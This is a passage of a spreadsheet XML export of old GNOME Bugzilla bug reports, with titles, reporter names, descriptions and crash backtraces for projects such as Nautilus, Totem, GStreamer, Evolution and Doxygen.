Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component panel-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>Walid.Tfaili</t>
  </si>
  <si>
    <t>DOXYGEN-335543</t>
  </si>
  <si>
    <t>Python: Parser gobbles comments between classes</t>
  </si>
  <si>
    <t>Please describe the problem:
Comments between two class definitions seem to disappear:
This code:
## This class does um A-type stuff.
# You know stuff that involves As.  Thats why its a class.
class A:
        pass
## This class does um B-type stuff.
# Whole lots of B stuff.  Lots of stuff with Bs.
class B(A):
        pass
yields:
.../doxygen/examples/pyexample.py:9: Warning: Compound pyexample::B is not
documented.
I've found two workarounds - move all class documentation to docstrings and
dodge the problem or interleave variable assignments between class definitions
(putting __ignore = True in between A and B makes it work properly.)
Steps to reproduce:
1. 
2. 
3. 
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>nscott</t>
  </si>
  <si>
    <t>NAUTILUS-356672</t>
  </si>
  <si>
    <t>fm_tree_model_unref_node fails ref_count &gt; 0 assert</t>
  </si>
  <si>
    <t>What were you doing when the application crashed?
I umounted a DVD and moving the up directory.
Distribution: Ubuntu 6.10 (edgy)
Gnome Release: 2.16.0 2006-09-04 (Ubuntu)
BugBuddy Version: 2.16.0
Memory status: size: 162635776 vsize: 0 resident: 162635776 share: 0 rss: 30535680 rss_rlim: 0
CPU usage: start_time: 1158631796 rtime: 0 utime: 5483 stime: 0 cutime:4342 cstime: 0 timeout: 1141 it_real_value: 0 frequency: 7
Backtrace was generated from '/usr/bin/nautilus'
(no debugging symbols found)
Using host libthread_db library /lib/tls/i686/cmov/libthread_db.so.1.
(no debugging symbols found)
[Thread debugging using libthread_db enabled]
[New Thread -1226938704 (LWP 4505)]
[New Thread -1259631712 (LWP 5786)]
(no debugging symbols found)
0xffffe410 in __kernel_vsyscall ()
#0  0xffffe410 in __kernel_vsyscall ()
#1  0xb762533b in __waitpid_nocancel ()
   from /lib/tls/i686/cmov/libpthread.so.0
#2  0xb7dba1b6 in gnome_gtk_module_info_get () from /usr/lib/libgnomeui-2.so.0
#3  
#4  0xffffe410 in __kernel_vsyscall ()
#5  0xb7361760 in *__GI_raise () from /lib/tls/i686/cmov/libc.so.6
#6  0xb7362ee3 in *__GI_abort () from /lib/tls/i686/cmov/libc.so.6
#7  0xb75ba1a2 in g_logv () from /usr/lib/libglib-2.0.so.0
#8  0xb75ba1d9 in g_log () from /usr/lib/libglib-2.0.so.0
#9  0xb75ba256 in g_assert_warning () from /usr/lib/libglib-2.0.so.0
#10 0x080d58e2 in fm_directory_view_bump_zoom_level ()
#11 0xb7bcc5ca in gtk_tree_model_unref_node ()
   from /usr/lib/libgtk-x11-2.0.so.0
#12 0xb7bd5b51 in gtk_tree_model_sort_convert_iter_to_child_iter ()
   from /usr/lib/libgtk-x11-2.0.so.0
#13 0xb7bcc5ca in gtk_tree_model_unref_node ()
   from /usr/lib/libgtk-x11-2.0.so.0
#14 0xb7bcc902 in gtk_tree_model_iter_nth_child ()
   from /usr/lib/libgtk-x11-2.0.so.0
#15 0xb7bcc8f3 in gtk_tree_model_iter_nth_child ()
   from /usr/lib/libgtk-x11-2.0.so.0
#16 0xb7bcc962 in gtk_tree_model_iter_nth_child ()
   from /usr/lib/libgtk-x11-2.0.so.0
#17 0xb7bcc9e3 in gtk_tree_row_reference_free ()
   from /usr/lib/libgtk-x11-2.0.so.0
#18 0xb7bd6eeb in _gtk_tree_selection_row_is_selectable ()
   from /usr/lib/libgtk-x11-2.0.so.0
#19 0xb7bd73e9 in _gtk_tree_selection_internal_select_node ()
   from /usr/lib/libgtk-x11-2.0.so.0
#20 0xb7be7d89 in gtk_tree_view_scroll_to_cell ()
   from /usr/lib/libgtk-x11-2.0.so.0
#21 0xb7bebb03 in gtk_tree_view_set_cursor_on_cell ()
   from /usr/lib/libgtk-x11-2.0.so.0
#22 0xb7bebbce in gtk_tree_view_set_cursor ()
   from /usr/lib/libgtk-x11-2.0.so.0
#23 0x080ce093 in fm_directory_view_bump_zoom_level ()
#24 0xb75afb11 in g_source_is_destroyed () from /usr/lib/libglib-2.0.so.0
#25 0xb75b1872 in g_main_context_dispatch () from /usr/lib/libglib-2.0.so.0
#26 0xb75b484f in g_main_context_check () from /usr/lib/libglib-2.0.so.0
#27 0xb75b4bf9 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#28 0xb7af0464 in gtk_main () from /usr/lib/libgtk-x11-2.0.so.0
#29 0x0807baba in POA_Nautilus_MetafileMonitor__init ()
#30 0xb734d8cc in __libc_start_main () from /lib/tls/i686/cmov/libc.so.6
#31 0x08067601 in ?? ()
Thread 2 (Thread -1259631712 (LWP 5786)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb76243eb in __read_nocancel () from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#2  0xb75b24cd in g_main_context_wakeup () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#3  0xb75cf41f in g_thread_create_full () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#4  0xb761e504 in start_thread () from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#5  0xb74054de in clone () from /lib/tls/i686/cmov/libc.so.6
No symbol table info available.
Thread 1 (Thread -1226938704 (LWP 4505)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb762533b in __waitpid_nocancel ()
   from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#2  0xb7dba1b6 in gnome_gtk_module_info_get () from /usr/lib/libgnomeui-2.so.0
No symbol table info available.
#3  
No symbol table info available.
#4  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#5  0xb7361760 in *__GI_raise () from /lib/tls/i686/cmov/libc.so.6
No locals.
#6  0xb7362ee3 in *__GI_abort () from /lib/tls/i686/cmov/libc.so.6
No locals.
#7  0xb75ba1a2 in g_logv () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#8  0xb75ba1d9 in g_log () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#9  0xb75ba256 in g_assert_warning () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#10 0x080d58e2 in fm_directory_view_bump_zoom_level ()
No symbol table info available.
#11 0xb7bcc5ca in gtk_tree_model_unref_node ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#12 0xb7bd5b51 in gtk_tree_model_sort_convert_iter_to_child_iter ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#13 0xb7bcc5ca in gtk_tree_model_unref_node ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#14 0xb7bcc902 in gtk_tree_model_iter_nth_child ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#15 0xb7bcc8f3 in gtk_tree_model_iter_nth_child ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#16 0xb7bcc962 in gtk_tree_model_iter_nth_child ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#17 0xb7bcc9e3 in gtk_tree_row_reference_free ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#18 0xb7bd6eeb in _gtk_tree_selection_row_is_selectable ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#19 0xb7bd73e9 in _gtk_tree_selection_internal_select_node ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#20 0xb7be7d89 in gtk_tree_view_scroll_to_cell ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#21 0xb7bebb03 in gtk_tree_view_set_cursor_on_cell ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#22 0xb7bebbce in gtk_tree_view_set_cursor ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#23 0x080ce093 in fm_directory_view_bump_zoom_level ()
No symbol table info available.
#24 0xb75afb11 in g_source_is_destroyed () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#25 0xb75b1872 in g_main_context_dispatch () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#26 0xb75b484f in g_main_context_check () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#27 0xb75b4bf9 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#28 0xb7af0464 in gtk_main () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#29 0x0807baba in POA_Nautilus_MetafileMonitor__init ()
No symbol table info available.
#30 0xb734d8cc in __libc_start_main () from /lib/tls/i686/cmov/libc.so.6
No locals.
#31 0x08067601 in ?? ()
No symbol table info available.
#0  0xffffe410 in __kernel_vsyscall ()</t>
  </si>
  <si>
    <t>adresimeyaz</t>
  </si>
  <si>
    <t>GSTREAMER-753473</t>
  </si>
  <si>
    <t>gst-rtsp-server</t>
  </si>
  <si>
    <t>rtsp-server: shared media uri with explicit port given doesn't match same path uri without port</t>
  </si>
  <si>
    <t>have a factory with
gst_rtsp_media_factory_set_shared (factory TRUE)
connect with one client to rtsp://host/stream
connect with second client to rtsp://host:port/stream
and it tries to re-configure the media</t>
  </si>
  <si>
    <t>GSTREAMER-159986</t>
  </si>
  <si>
    <t>[PATCH] Videorate doesn't handle seek and doesn't reset when going from PAUSED to READY</t>
  </si>
  <si>
    <t>The videorate element doesn't reset itself when going from GST_STATE_PAUSED to
GST_STATE_READY and it doesn't handle GST_EVENT_SEEK.</t>
  </si>
  <si>
    <t>PYGTK-119947</t>
  </si>
  <si>
    <t>Review gtk*store* functions</t>
  </si>
  <si>
    <t>As Alex pointed out on IRC gtk_list_store_remove should return a
GtkTreeIter it's now fixed in CVS but we need to do a review of all store
functions to make sure they return iters correctly.</t>
  </si>
  <si>
    <t>GNOME-DESKTOP-135481</t>
  </si>
  <si>
    <t>The language treeview should use GTK_SHADOW_IN</t>
  </si>
  <si>
    <t>For consistency the scrolledwindow around the languages treeview in the
properties window should use GTK_SHADOW_IN. It is done like that everywhere
in GNOME except for here and in gnome-applets.</t>
  </si>
  <si>
    <t>GTKHTML-257572</t>
  </si>
  <si>
    <t>Whle editing HTML messages font sizes not working</t>
  </si>
  <si>
    <t>Please fill in this template when reporting a bug unless you know what you
are doing.
Description of Problem:
While sending HTML email the size of the fonts can not be changed. Any
modifiation produces no result at all.
Steps to reproduce the problem:
Try to send an HTML message with a biger os smaller size of the default.
Actual Results:
None.
Expected Results:
Size larger os smaller.
How often does this happen? 
Allways.
Additional Information:
Evolution 1.5.7 compiled loally form the .tar.bz2 package.</t>
  </si>
  <si>
    <t>thomassoares</t>
  </si>
  <si>
    <t>GTK+-169528</t>
  </si>
  <si>
    <t>Widget: GtkIconView</t>
  </si>
  <si>
    <t>GtkIconView should queue a resize/redraw when unsetting a model</t>
  </si>
  <si>
    <t>Unsetting a previously set model (e.g. gtk_icon_view_set_model (iv NULL))
doesn't trigger a redraw / size renegotiation.</t>
  </si>
  <si>
    <t>tomislav.jonjic</t>
  </si>
  <si>
    <t>PAN-118740</t>
  </si>
  <si>
    <t>newsrc.c line 109 and 454</t>
  </si>
  <si>
    <t>The following error is reported every now and then in my logs.
(Null) - file newsrc.c: line 109 (parse_read_str):assertion 'str!=NULL' failed
(Null) - file newsrc.c: line 454 (newsrc_init_from_range_str):assertion
'range_str !=NULL' failed</t>
  </si>
  <si>
    <t>anton_bossenbroek</t>
  </si>
  <si>
    <t>GNOME-CONTROL-CENTER-166267</t>
  </si>
  <si>
    <t>Large cleanup patch</t>
  </si>
  <si>
    <t>This patch does the following:
- remove a load of leaks in the theme manager code
- move said code to use GtkIconTheme
- clean up some sparse warnings here and there
- build fixes
- maybe more? :-)</t>
  </si>
  <si>
    <t>EVOLUTION-223246</t>
  </si>
  <si>
    <t>LDAP addressbook stops responding after Pilot Sync</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Normal
Version: 1.0.3
Synopsis: LDAP addressbook stops responding after Pilot Sync
Bugzilla-Product: Evolution
Bugzilla-Component: Contacts [was: Addressbook]
Description:
I've configured an additional addressbook source and it seems to present
the Could not contact LDAP server pop up when I access it subsequent
to a Palm Pilot Sync.
Hope this helps.   Evolution really kicks ass! (And have you thought
about starting a skate clothing company with that cute logo!?)
Unknown reporter: dbartle@zkey.com changed to bugbuddy-import@ximian.com.
</t>
  </si>
  <si>
    <t>dbartle</t>
  </si>
  <si>
    <t>GDL-377062</t>
  </si>
  <si>
    <t>GDL</t>
  </si>
  <si>
    <t>Intltool-update -m complains about nonexisting files in POTFILES.in</t>
  </si>
  <si>
    <t>Please describe the problem:
show_bug.cgi?id=336225gabor@gabor-laptop:~/tmp/gdl/po$ intltool-update -m
The following files do not exist anymore:
gdl/gdl-recent.c
scintilla-control/test.c
Please remove them from POTFILES.in or POTFILES.skip. A file 'notexist'
containing this list of absent files has been written in the current directory.
Steps to reproduce:
1. 
2. 
3. 
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>anjuta-maint</t>
  </si>
  <si>
    <t>TOTEM-112761</t>
  </si>
  <si>
    <t>totem crashes on opening an URL</t>
  </si>
  <si>
    <t xml:space="preserve">Package: totem
Severity: critical
Version: GNOME2.3.0 0.96.0
os_details: GARNOME
Synopsis: totem crashes on opening an URL
Bugzilla-Product: totem
Bugzilla-Component: general
BugBuddy-GnomeVersion: 2.0 (2.3.0)
Description:
Description of Problem:
Trying to directly access a file from the web. 
Steps to reproduce the problem:
1. Run Totem
2. Open frm URI
3. Type
http://www.kaena.lycos.fr/wmv_en/BandeAnnonce/Kaena_FA_VF_800k.wmv
Actual Results:
Crash
Expected Results:
View the trailer of Kaena
How often does this happen?
Always
Additional Information:
Debugging Information:
Backtrace was generated from '/garnome/bin/totem'
[New Thread 1024 (LWP 3882)]
[New Thread 2049 (LWP 3884)]
[New Thread 1026 (LWP 3885)]
[New Thread 2051 (LWP 3886)]
[New Thread 3076 (LWP 3887)]
[New Thread 7173 (LWP 3891)]
[New Thread 8198 (LWP 3892)]
[New Thread 9223 (LWP 3893)]
[New Thread 10248 (LWP 3894)]
0x408dc449 in wait4 () from /lib/libc.so.6
#0  0x408dc449 in wait4 () from /lib/libc.so.6
#1  0x40958f70 in __DTOR_END__ () from /lib/libc.so.6
#2  0x4081ca73 in waitpid () from /lib/libpthread.so.0
#3  0x4006063e in libgnomeui_segv_handle (signum=11) at
gnome-ui-init.c:646
#4  0x4081a11b in pthread_sighandler () from /lib/libpthread.so.0
#5  
#6  0x408b2381 in strstr () from /lib/libc.so.6
#7  0x0805a2be in totem_create_full_path (path=0x1 &lt;Address 0x1 out of
bounds&gt;)
    at totem.c:142
#8  0x0805c152 in totem_action_open_files (totem=0x80b0058
list=0xbfffee38 
    ignore_first=0) at totem.c:1150
#9  0x0805c5fb in on_open_location1_activate (button=0x80e57f8 
    totem=0x80b0058) at totem.c:1321
#10 0x407482f4 in g_cclosure_marshal_VOID__VOID (closure=0x80eba48 
    return_value=0x0 n_param_values=1 param_values=0xfffffe00 
    invocation_hint=0xbfffef88 marshal_data=0x0) at gmarshal.c:77
#11 0x40735e93 in g_closure_invoke (closure=0x80eba48 return_value=0x0
    n_param_values=1 param_values=0xbffff080
invocation_hint=0xbfffef88)
    at gclosure.c:437
#12 0x40747e85 in signal_emit_unlocked_R (node=0x80a43b0 detail=0 
    instance=0x80e57f8 emission_return=0x0
instance_and_params=0xbffff080)
    at gsignal.c:2822
#13 0x40746f18 in g_signal_emit_valist (instance=0x80e57f8 
    signal_id=135157752 detail=0 var_args=0xbffff20c \004)
    at gsignal.c:2554
#14 0x40747136 in g_signal_emit (instance=0x80e57f8 signal_id=96
detail=0)
    at gsignal.c:2612
#15 0x403eb34d in gtk_widget_activate (widget=0x80e57f8) at
gtkwidget.c:3175
#16 0x4031b814 in gtk_menu_shell_activate_item (menu_shell=0x80e99e0 
    menu_item=0x80e57f8 force_deactivate=1) at gtkmenushell.c:914
#17 0x4031a889 in gtk_menu_shell_button_release (widget=0x80e99e0 
    event=0x8325038) at gtkmenushell.c:528
#18 0x40313174 in gtk_menu_button_release (widget=0x80e99e0
event=0x8325038)
    at gtkmenu.c:1972
#19 0x4030a603 in _gtk_marshal_BOOLEAN__BOXED (closure=0x80e99e0 
    return_value=0xbffff3f0 n_param_values=2 param_values=0xbffff510
    invocation_hint=0xbffff418 marshal_data=0x403130e0) at
gtkmarshalers.c:82
#20 0x40736155 in g_type_class_meta_marshal (closure=0x809d658 
    return_value=0xbffff3f0 n_param_values=2 param_values=0xbffff510
    invocation_hint=0xbffff418 marshal_data=0xfffffe00) at
gclosure.c:514
#21 0x40735e93 in g_closure_invoke (closure=0x809d658 
    return_value=0xbffff3f0 n_param_values=2 param_values=0xbffff510
    invocation_hint=0xbffff418) at gclosure.c:437
#22 0x40747963 in signal_emit_unlocked_R (node=0x809d6a0 detail=0 
    instance=0x80e99e0 emission_return=0xbffff4b0 
    instance_and_params=0xbffff510) at gsignal.c:2860
#23 0x40746d1e in g_signal_emit_valist (instance=0x80e99e0 signal_id=0
    detail=0 var_args=0xbffff6a0
Â¸Ã¶Ã¿Â¿\220Âº\a\bÃˆÃ¶Ã¿Â¿}Â®&gt;@Â¸Ã¶Ã¿Â¿)
    at gsignal.c:2564
#24 0x40747136 in g_signal_emit (instance=0x80e99e0 signal_id=43
detail=0)
    at gsignal.c:2612
#25 0x403eb15d in gtk_widget_event_internal (widget=0x80e99e0
event=0x8325038)
    at gtkwidget.c:3143
#26 0x4030a3d3 in gtk_propagate_event (widget=0x80e99e0
event=0x8325038)
    at gtkmain.c:2267
#27 0x4030906f in gtk_main_do_event (event=0x8325038) at gtkmain.c:1502
#28 0x405b293f in gdk_event_dispatch (source=0xfffffe00 callback=0 
    user_data=0x0) at gdkevents-x11.c:2018
#29 0x40786f0e in g_main_dispatch (context=0x808af20) at gmain.c:1653
#30 0x40787f19 in g_main_context_dispatch (context=0x808af20) at
gmain.c:2197
#31 0x40788252 in g_main_context_iterate (context=0x808af20 block=1 
    dispatch=1 self=0x8073db0) at gmain.c:2278
#32 0x40788920 in g_main_loop_run (loop=0x82b21f8) at gmain.c:2498
#33 0x40308817 in gtk_main () at gtkmain.c:1092
#34 0x080601fe in main (argc=1 argv=0xbffff8d4) at totem.c:3098
#35 0x408564f2 in __libc_start_main () from /lib/libc.so.6
Thread 9 (Thread 10248 (LWP 3894)):
#0  0x40867f19 in sigsuspend () from /lib/libc.so.6
No symbol table info available.
#1  0x40819d38 in __pthread_wait_for_restart_signal ()
   from /lib/libpthread.so.0
No symbol table info available.
#2  0x4081614b in pthread_cond_wait () from /lib/libpthread.so.0
No symbol table info available.
#3  0x407e66b1 in listener_loop (queue_gen=0x8e89640) at events.c:54
	running = 1082236216
#4  0x40955288 in main_arena () from /lib/libc.so.6
No symbol table info available.
Thread 8 (Thread 9223 (LWP 3893)):
#0  0x40867f19 in sigsuspend () from /lib/libc.so.6
No symbol table info available.
#1  0x40819d38 in __pthread_wait_for_restart_signal ()
   from /lib/libpthread.so.0
No symbol table info available.
#2  0x4081614b in pthread_cond_wait () from /lib/libpthread.so.0
No symbol table info available.
#3  0x407d9d04 in fifo_buffer_get (fifo=0x8cd4ab8) at buffer.c:188
No locals.
Thread 7 (Thread 8198 (LWP 3892)):
#0  0x40867f19 in sigsuspend () from /lib/libc.so.6
No symbol table info available.
#1  0x40819d38 in __pthread_wait_for_restart_signal ()
   from /lib/libpthread.so.0
No symbol table info available.
#2  0x4081614b in pthread_cond_wait () from /lib/libpthread.so.0
No symbol table info available.
#3  0x407d9d04 in fifo_buffer_get (fifo=0x88e18f0) at buffer.c:188
No locals.
Thread 6 (Thread 7173 (LWP 3891)):
#0  0x408dc881 in nanosleep () from /lib/libc.so.6
No symbol table info available.
#1  0x4081c56c in nanosleep () from /lib/libpthread.so.0
No symbol table info available.
Thread 5 (Thread 3076 (LWP 3887)):
#0  0x40867f19 in sigsuspend () from /lib/libc.so.6
No symbol table info available.
#1  0x40819d38 in __pthread_wait_for_restart_signal ()
   from /lib/libpthread.so.0
No symbol table info available.
#2  0x4081614b in pthread_cond_wait () from /lib/libpthread.so.0
No symbol table info available.
#3  0x407e3b48 in ao_loop (this_gen=0x0) at audio_out.c:254
	hw_vpts = 0
	in_buf = (struct audio_buffer_s *) 0x838949c
	out_buf = (struct audio_buffer_s *) 0x0
	gap = 592386594116206592
	delay = 592386594116206592
	cur_time = 1082195968
	last_sync_time = 4648050355471384576
	bufs_since_sync = 0
Thread 4 (Thread 2051 (LWP 3886)):
#0  0x40903cfb in poll () from /lib/libc.so.6
No symbol table info available.
#1  0x40c4e959 in snd_mixer_wait () from /usr/lib/libasound.so.2
No symbol table info available.
#2  0x4125e24e in ao_alsa_handle_event_thread (data=0x1)
    at audio_alsa_out.c:127
No locals.
Thread 3 (Thread 1026 (LWP 3885)):
#0  0x408dc881 in nanosleep () from /lib/libc.so.6
No symbol table info available.
#1  0x40819e98 in __pthread_timedsuspend_new () from
/lib/libpthread.so.0
No symbol table info available.
#2  0x40816389 in pthread_cond_timedwait_relative () from
/lib/libpthread.so.0
No symbol table info available.
#3  0x407d78de in metronom_sync_loop (this=0x80000000) at
metronom.c:724
	tv = {tv_sec = 1082284736 tv_usec = -1082131456}
	ts = {tv_sec = 1052640875 tv_nsec = 898428}
	scr = (struct scr_plugin_s **) 0x837f678
	pts = 4647003288607128312
#4  0x000db578 in ?? ()
No symbol table info available.
#0  0x408dc449 in wait4 () from /lib/libc.so.6
------- Bug moved to this database by unknown@bugzilla.gnome.org 2003-05-11 04:32 -------
The original reporter (dalonso@apanoia.net) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component hadess@hadess.net.
</t>
  </si>
  <si>
    <t>dalonso</t>
  </si>
  <si>
    <t>EVOLUTION-243103</t>
  </si>
  <si>
    <t>After closing appointment dialog cannot edit summary in day view</t>
  </si>
  <si>
    <t>Please fill in this template when reporting a bug unless you know what you
are doing.
Description of Problem:
After you close an appointment editor dialog for an appointment you cannot
edit the summary for that appointment in the day view. You can move the
cursor within the summary text using the mouse but the key board input
seems to redirected to the task pad.
You have to click on a different existing appointment to get keyboard input
focus back to the calendar day view.
This also occurs if you save changes in the appointment editor too.
How often does this happen? 
everytime
Additional Information:
Machine Configuration
------------------------------------------------------------------
Linux tlee 2.4.18-14 #1 Wed Sep 4 13:35:50 EDT 2002 i686 i686 i386 GNU/Linux
evolution1.3-1.3.3.99.0.200305150601-0.snap.ximian.5.1
ximian-connector1.3-1.3.3.1.0.200305150601-0.snap.ximian.5.1
libsoup-1.99.21.0.200305150601-0.snap.ximian.5.1
libgtkhtml3.0_1-3.0.3.0.200305150601-0.snap.ximian.5.1
libgal19-0.19.2-4
libgal2.0_2-1.99.3.99.0.200304280601-0.snap.ximian.1
libgal2.0_3-1.99.4.99.0.200305150601-0.snap.ximian.5.1
gtkhtml-1.0.4-3
gtkhtml3.0-3.0.3.0.200305150601-0.snap.ximian.5.1
gal-0.19.2-4
evolution1.3-pilot-1.3.3.99.0.200305150601-0.snap.ximian.5.1
pilot-link-0.11.3-3
gnome-pilot-2.0.8.0.200305150601-0.snap.ximian.5.1
gnome-pilot-applet-2.0.8.0.200305150601-0.snap.ximian.5.1
gnome-mime-data-2.0.0-9
gtk+-1.2.10-22
gtk2-2.0.6-8
bonobo-1.0.21-1.ximian.1
libbonoboui-2.0.1-2
libgnomecanvas-2.2.0.2-0.ximian.5.2</t>
  </si>
  <si>
    <t>GSTREAMER-345513</t>
  </si>
  <si>
    <t>Movie playing fails with gstreamer but succeeds with mplayer</t>
  </si>
  <si>
    <t>I have this movie that doesn't start playin with gstreamer but plays fine with mplayer. Because the nature of the movie it's probably not allowed to post parts of it here (not that I know how to do it) but I'm ready to carry out instructions if I'm required to.
$ gst-launch playbin uri=file:///home/lubo/share/movies/The\ Omen.mp4
Setting pipeline to PAUSED ...
Pipeline is PREROLLING ...
ERROR: from element /playbin0/decoder/faad0: Could not decode stream.
Additional debug info:
gstfaad.c(1403): gst_faad_chain (): /playbin0/decoder/faad0:
Failed to decode buffer: Unexpected channel configuration change
ERROR: pipeline doesn't want to preroll.
Setting pipeline to NULL ...
FREEING pipeline ...
$ mplayer -xy 2 share/movies/The\ Omen.mp4
MPlayer dev-SVN-r18765-4.1.1 (C) 2000-2006 MPlayer Team
CPU:                 Intel(R) Celeron(R) CPU 2.60GHz (Family: 15 Model: 2 Step
ping: 9)
CPUflags:  MMX: 1 MMX2: 1 3DNow: 0 3DNow2: 0 SSE: 1 SSE2: 1
Compiled for x86 CPU with extensions: MMX MMX2 SSE SSE2
Playing share/movies/The Omen.mp4.
ISO: Unknown File Type Major Brand: MSNV
Quicktime/MOV file format detected.
VIDEO:  [mp4v]  320x192  24bpp  25.000 fps    0.0 kbps ( 0.0 kbyte/s)
[VO_SDL] Using driver: x11.
==========================================================================
Opening video decoder: [ffmpeg] FFmpeg's libavcodec codec family
Selected video codec: [ffodivx] vfm: ffmpeg (FFmpeg MPEG-4)
==========================================================================
==========================================================================
Opening audio decoder: [faad] AAC (MPEG2/4 Advanced Audio Coding)
AUDIO: 48000 Hz 2 ch s16le 128.0 kbit/8.33% (ratio: 16000-&gt;192000)
Selected audio codec: [faad] afm: faad (FAAD AAC (MPEG-2/MPEG-4 Audio) decoder)
==========================================================================
AO: [oss] 48000Hz 2ch s16le (2 bytes per sample)
Starting playback...
VDec: vo config request - 320 x 192 (preferred colorspace: Planar YV12)
VDec: using Planar YV12 as output csp (no 0)
Movie-Aspect is 1.67:1 - prescaling to correct movie aspect.
VO: [sdl] 320x192 =&gt; 640x384 Planar YV12
Selected font is fixed-width.</t>
  </si>
  <si>
    <t>GPERFMETER-96203</t>
  </si>
  <si>
    <t>GPERFMETER</t>
  </si>
  <si>
    <t>have unlocalized messages</t>
  </si>
  <si>
    <t>cpu packets load strings in the window
are not localized even with .mo file is present
at $prefix/share/locale/.
Many of N_( should be replaced with _(.</t>
  </si>
  <si>
    <t>bharat.tewari</t>
  </si>
  <si>
    <t>hidetoshi.tajima</t>
  </si>
  <si>
    <t>EVOLUTION-205157</t>
  </si>
  <si>
    <t>dialog for editing categories list can't be closed</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Normal
Version: 0.11
Synopsis: dialog for editing categories list can't be closed
Bugzilla-Product: Evolution
Bugzilla-Component: Addressbook
Description:
There seems to be a reproducable bug in evolution 0.11.ximian.2 concerning the contacts feature.
After opening the dialog edit global categories list (translated from  german Globale Kategorieliste bearbeiten) I cannot close that dialog by means of the close button at least when not changing any of the entries.
Unknown reporter: jan.grobecker@gmx.net changed to bugbuddy-import@ximian.com.
</t>
  </si>
  <si>
    <t>bugbuddy-import</t>
  </si>
  <si>
    <t>GLIB-135730</t>
  </si>
  <si>
    <t>add g_debug to the g_output family</t>
  </si>
  <si>
    <t>There are output functions for evey G_LOG_LEVEL_* except G_LOG_LEVEL_DEBUG.
Please add g_debug.</t>
  </si>
  <si>
    <t>herzi</t>
  </si>
  <si>
    <t>GTKMM-83244</t>
  </si>
  <si>
    <t>GdkRgbCmap not wrapped</t>
  </si>
  <si>
    <t>There's no wrapper for the GdkRgbCmap gdk object.
This object is used in the draw_indexed_image method from Gdk::Drawable.</t>
  </si>
  <si>
    <t>osamyn</t>
  </si>
  <si>
    <t>GTK+-52433</t>
  </si>
  <si>
    <t>Add mnemonics to dialogs</t>
  </si>
  <si>
    <t>Now that we have an understandable mnemonic system it would be great to
add them to built in dialogs such as the File Selector or the color browser.</t>
  </si>
  <si>
    <t>GNOME-MAG-448827</t>
  </si>
  <si>
    <t>magnifier-utility</t>
  </si>
  <si>
    <t>GNOME-MAG</t>
  </si>
  <si>
    <t>make distcheck failing due the missing of POTFILES.skip</t>
  </si>
  <si>
    <t>When running make distcheck in Ubuntu 7.04 I'm having the following error:
The following files contain translations and are currently not in use. Please
consider adding these to the POTFILES.in file located in the po/ directory.
colorblind/GNOME_Magnifier_ColorblindApplet.server.in
magnifier/GNOME_Magnifier.server.in
If some of these files are left out on purpose then please add them to
POTFILES.skip instead of POTFILES.in. A file 'missing' containing this list
of left out files has been written in the current directory.
Adding they to the file POTFILES.skip make the distcheck rule run successfully.</t>
  </si>
  <si>
    <t>EVOLUTION-205940</t>
  </si>
  <si>
    <t>Use DATE values for all-day events</t>
  </si>
  <si>
    <t>All-day events - use DATE values. Change event editor so it only depends on
if the times are DATE or DATE-TIME values. Also need to update code which
uses time values so it handles DATE values properly (i.e. includes the
entire day). Should hide the timezone fields for all-day events.
Unfortunately libical seems to have poor support for DATE values.
I've had a few problems already with RRULE UNTIL and EXDATEs.
The convenience functions like icalproperty_get_dtstart() only work with
DATE-TIME values at present so I need to update the Perl script to
support DATE values as well. (I've already done that for EXDATEs.)</t>
  </si>
  <si>
    <t>F-SPOT-168089</t>
  </si>
  <si>
    <t>Exif data strips last character</t>
  </si>
  <si>
    <t>Please describe the problem:
Viewing EXIF data strips off the last character of the data as shown below (and
example)..
Image Description	
Manufacturer	SON
Model	CYBERSHO
Orientation	top - lef
x-Resolution	72.0
y-Resolution	72.0
Resolution Unit	Inc
Date and Time	2004:10:25 10:00:5
etc.
Steps to reproduce:
1. Import picture 
2. View EXIF Data 
3. Thats it! 
Actual results:
See above
Expected results:
Correct tags
Does this happen every time?
Yes
Other information:
I think this is the cause of 168086</t>
  </si>
  <si>
    <t>mmarquee</t>
  </si>
  <si>
    <t>EVOLUTION-225540</t>
  </si>
  <si>
    <t>All fields for LDAP contact are greyed out yet popup editors work</t>
  </si>
  <si>
    <t>When I double-click on an address book entry all the field labels are 
greyed out and the text boxes are uneditable. Despite this if I click 
